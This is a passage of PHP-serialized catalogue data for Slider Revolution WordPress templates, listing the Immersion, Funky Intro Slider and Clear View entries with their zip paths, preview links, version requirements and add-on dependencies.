Page\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"10\";s:9:\"installed\";b:0;}i:204;a:25:{s:2:\"id\";s:3:\"213\";s:5:\"title\";s:19:\"Immersion Mountains\";s:5:\"alias\";s:19:\"immersion-mountains\";s:3:\"zip\";s:29:\"packs/immersion-mountains.zip\";s:3:\"uid\";s:32:\"817167eb3fe22b7e065ba210cbe6d53c\";s:3:\"img\";s:30:\"immersion-mountains/slide1.jpg\";s:7:\"preview\";s:74:\"https://revolution.themepunch.com/immersion-wordpress-one-page-theme-2018/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:292:\"<span class=\"ttm_content\">The Immersion WordPress one page theme is a great fit if you quickly want to setup a visually oriented one page website. Using the power of Slider Revolution, we added some interesting effects like slicing and smooth parallax.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:171:\"[{\"path\":\"revslider-slicey-addon\\/revslider-slicey-addon.php\",\"name\":\"Background Slicey Add-On\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Immersion One Page\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"10\";s:9:\"installed\";b:0;}i:205;a:25:{s:2:\"id\";s:3:\"214\";s:5:\"title\";s:17:\"Immersion Product\";s:5:\"alias\";s:17:\"immersion-product\";s:3:\"zip\";s:27:\"packs/immersion-product.zip\";s:3:\"uid\";s:32:\"64134f263484d2bbcd7ef088ffbbfb4b\";s:3:\"img\";s:28:\"immersion-product/slide1.jpg\";s:7:\"preview\";s:74:\"https://revolution.themepunch.com/immersion-wordpress-one-page-theme-2018/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:292:\"<span class=\"ttm_content\">The Immersion WordPress one page theme is a great fit if you quickly want to setup a visually oriented one page website. Using the power of Slider Revolution, we added some interesting effects like slicing and smooth parallax.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Immersion One Page\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"10\";s:9:\"installed\";b:0;}i:206;a:25:{s:2:\"id\";s:3:\"215\";s:5:\"title\";s:16:\"Immersion Design\";s:5:\"alias\";s:16:\"immersion-design\";s:3:\"zip\";s:26:\"packs/immersion-design.zip\";s:3:\"uid\";s:32:\"91e1d77c1a2826438763804f4d02bc26\";s:3:\"img\";s:27:\"immersion-design/slide1.jpg\";s:7:\"preview\";s:74:\"https://revolution.themepunch.com/immersion-wordpress-one-page-theme-2018/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:292:\"<span class=\"ttm_content\">The Immersion WordPress one page theme is a great fit if you quickly want to setup a visually oriented one page website. Using the power of Slider Revolution, we added some interesting effects like slicing and smooth parallax.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Immersion One Page\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"10\";s:9:\"installed\";b:0;}i:207;a:25:{s:2:\"id\";s:3:\"216\";s:5:\"title\";s:22:\"Immersion Phototgraphy\";s:5:\"alias\";s:21:\"immersion-photography\";s:3:\"zip\";s:31:\"packs/immersion-photography.zip\";s:3:\"uid\";s:32:\"e3ddf0c577b09740f5cbf2e38ffd684d\";s:3:\"img\";s:32:\"immersion-photography/slide1.jpg\";s:7:\"preview\";s:74:\"https://revolution.themepunch.com/immersion-wordpress-one-page-theme-2018/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:292:\"<span class=\"ttm_content\">The Immersion WordPress one page theme is a great fit if you quickly want to setup a visually oriented one page website. Using the power of Slider Revolution, we added some interesting effects like slicing and smooth parallax.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Immersion One Page\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"10\";s:9:\"installed\";b:0;}i:208;a:25:{s:2:\"id\";s:3:\"217\";s:5:\"title\";s:14:\"Immersion Grid\";s:5:\"alias\";s:14:\"immersion-grid\";s:3:\"zip\";s:24:\"packs/immersion-grid.zip\";s:3:\"uid\";s:32:\"b6903868189bb83b2c7a852fde3a7dc3\";s:3:\"img\";s:25:\"immersion-grid/slide1.jpg\";s:7:\"preview\";s:74:\"https://revolution.themepunch.com/immersion-wordpress-one-page-theme-2018/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.4.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:292:\"<span class=\"ttm_content\">The Immersion WordPress one page theme is a great fit if you quickly want to setup a visually oriented one page website. Using the power of Slider Revolution, we added some interesting effects like slicing and smooth parallax.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Immersion One Page\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"10\";s:9:\"installed\";b:0;}i:209;a:22:{s:2:\"id\";s:3:\"218\";s:5:\"title\";s:18:\"Funky Intro Slider\";s:5:\"alias\";s:11:\"funkyslider\";s:3:\"zip\";s:15:\"funkyslider.zip\";s:3:\"uid\";s:32:\"2d4187e3fdad19b976be335253c8925d\";s:3:\"img\";s:22:\"funkyslider/slide1.jpg\";s:7:\"preview\";s:70:\"https://revolution.themepunch.com/funky-intro-slider-wordpress-plugin/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:200:\"<span class=\"ttm_content\">This funky intro slider fits just right if you need a striking introduction to your website! Sleek, beautiful and easily customizable!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:335:\"[{\"path\":\"revslider-typewriter-addon\\/revslider-typewriter-addon.php\",\"name\":\"Typewriter AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/typewriter-addon\\/\"},{\"path\":\"revslider-revealer-addon\\/revslider-revealer-addon.php\",\"name\":\"Reveal AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:210;a:25:{s:2:\"id\";s:3:\"219\";s:5:\"title\";s:19:\"Clear View Magazine\";s:5:\"alias\";s:27:\"clear-view-magazine-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:27:\"clear-view-magazine-package\";s:3:\"img\";s:41:\"packages/clear_view_magazine_overview.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-minimal-magazine-wordpress-template/\";s:7:\"version\";s:5:\"1.0.3\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";s:163:\"[{\"path\":\"revslider-revealer-addon\\/revslider-revealer-addon.php\",\"name\":\"Reveal AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:19:\"Clear View Magazine\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"11\";s:9:\"installed\";b:0;}i:211;a:25:{s:2:\"id\";s:3:\"220\";s:5:\"title\";s:15:\"Clear View Menu\";s:5:\"alias\";s:14:\"clearview_menu\";s:3:\"zip\";s:24:\"packs/clearview_menu.zip\";s:3:\"uid\";s:32:\"eaecee5fa5f3c3a7f4d2a96c4616a353\";s:3:\"img\";s:25:\"clearview_menu/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-minimal-magazine-wordpress-template/\";s:7:\"version\";s:5:\"1.0.3\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:19:\"Clear View Magazine\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"11\";s:9:\"installed\";b:0;}i:212;a:25:{s:2:\"id\";s:3:\"221\";s:5:\"title\";s:17:\"Clear View Header\";s:5:\"alias\";s:16:\"clearview_header\";s:3:\"zip\";s:26:\"packs/clearview_header.zip\";s:3:\"uid\";s:32:\"25e3dd80ad130875d7438a07952cb0cd\";s:3:\"img\";s:27:\"clearview_header/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-minimal-magazine-wordpress-template/\";s:7:\"version\";s:5:\"1.0.3\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:163:\"[{\"path\":\"revslider-revealer-addon\\/revslider-revealer-addon.php\",\"name\":\"Reveal AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:19:\"Clear View Magazine\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"11\";s:9:\"installed\";b:0;}i:213;a:25:{s:2:\"id\";s:3:\"222\";s:5:\"title\";s:18:\"Clear View Mission\";s:5:\"alias\";s:17:\"clearview_mission\";s:3:\"zip\";s:27:\"packs/clearview_mission.zip\";s:3:\"uid\";s:32:\"35b2092a49fd2beb549342e69097eb5b\";s:3:\"img\";s:28:\"clearview_mission/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-minimal-magazine-wordpress-template/\";s:7:\"version\";s:5:\"1.0.3\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:19:\"Clear View Magazine\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"11\";s:9:\"installed\";b:0;}i:214;a:25:{s:2:\"id\";s:3:\"223\";s:5:\"title\";s:17:\"Clear View Slider\";s:5:\"alias\";s:17:\"clear-view-slider\";s:3:\"zip\";s:27:\"packs/clear-view-slider.zip\";s:3:\"uid\";s:32:\"d2e17edffce16ed78c54b0ef23fd7e05\";s:3:\"img\";s:28:\"clear-view-slider/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-minimal-magazine-wordpress-template/\";s:7:\"version\";s:5:\"1.0.3\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:19:\"Clear View Magazine\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"11\";s:9:\"installed\";b:0;}i:215;a:25:{s:2:\"id\";s:3:\"224\";s:5:\"title\";s:15:\"Clear View News\";s:5:\"alias\";s:15:\"clear-view-news\";s:3:\"zip\";s:25:\"packs/clear-view-news.zip\";s:3:\"uid\";s:32:\"5698d3131ba141e9afcfd2906739dd00\";s:3:\"img\";s:26:\"clear-view-news/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-minimal-magazine-wordpress-template/\";s:7:\"version\";s:5:\"1.0.3\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:19:\"Clear View Magazine\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"11\";s:9:\"installed\";b:0;}i:216;a:25:{s:2:\"id\";s:3:\"225\";s:5:\"title\";s:18:\"Clear View Clients\";s:5:\"alias\";s:18:\"clear-view-clients\";s:3:\"zip\";s:28:\"packs/clear-view-clients.zip\";s:3:\"uid\";s:32:\"b95616a94832e22bdfac5ce60232be1b\";s:3:\"img\";s:29:\"clear-view-clients/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-minimal-magazine-wordpress-template/\";s:7:\"version\";s:5:\"1.0.3\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:19:\"Clear View Magazine\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"11\";s:9:\"installed\";b:0;}i:217;a:25:{s:2:\"id\";s:3:\"226\";s:5:\"title\";s:18:\"Clear View Contact\";s:5:\"alias\";s:18:\"clear-view-contact\";s:3:\"zip\";s:28:\"packs/clear-view-contact.zip\";s:3:\"uid\";s:32:\"0e0cc1d8f6f6500e5f8a2b091fa3b4cb\";s:3:\"img\";s:29:\"clear-view-contact/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-minimal-magazine-wordpress-template/\";s:7:\"version\";s:5:\"1.0.3\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:19:\"Clear View Magazine\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"11\";s:9:\"installed\";b:0;}i:218;a:25:{s:2:\"id\";s:3:\"227\";s:5:\"title\";s:20:\"Clear View Post Page\";s:5:\"alias\";s:28:\"clear-view-post-page-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:28:\"clear-view-post-page-package\";s:3:\"img\";s:42:\"packages/clear_view_post_page_overview.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-single-post-page-wordpress-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";s:163:\"[{\"path\":\"revslider-revealer-addon\\/revslider-revealer-addon.php\",\"name\":\"Reveal AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Clear View Post Page\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"12\";s:9:\"installed\";b:0;}i:219;a:25:{s:2:\"id\";s:3:\"228\";s:5:\"title\";s:22:\"Clear View Single Menu\";s:5:\"alias\";s:22:\"clear-view-single-menu\";s:3:\"zip\";s:32:\"packs/clear-view-single-menu.zip\";s:3:\"uid\";s:32:\"1e80f81982f8a4ea763482d4fa99d321\";s:3:\"img\";s:33:\"clear-view-single-menu/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-single-post-page-wordpress-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Clear View Post Page\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"12\";s:9:\"installed\";b:0;}i:220;a:25:{s:2:\"id\";s:3:\"229\";s:5:\"title\";s:24:\"Clear View Single Header\";s:5:\"alias\";s:24:\"clear-view-single-header\";s:3:\"zip\";s:34:\"packs/clear-view-single-header.zip\";s:3:\"uid\";s:32:\"c8d717627be6cd5e70922ab609694dbf\";s:3:\"img\";s:35:\"clear-view-single-header/slide1.jpg\";s:7:\"preview\";s:81:\"https://revolution.themepunch.com/clear-view-single-post-page-wordpress-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">The Clear View Minimal Magazine WordPress Template is a full Slider Revolution module arrangement with fully customizable content.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a 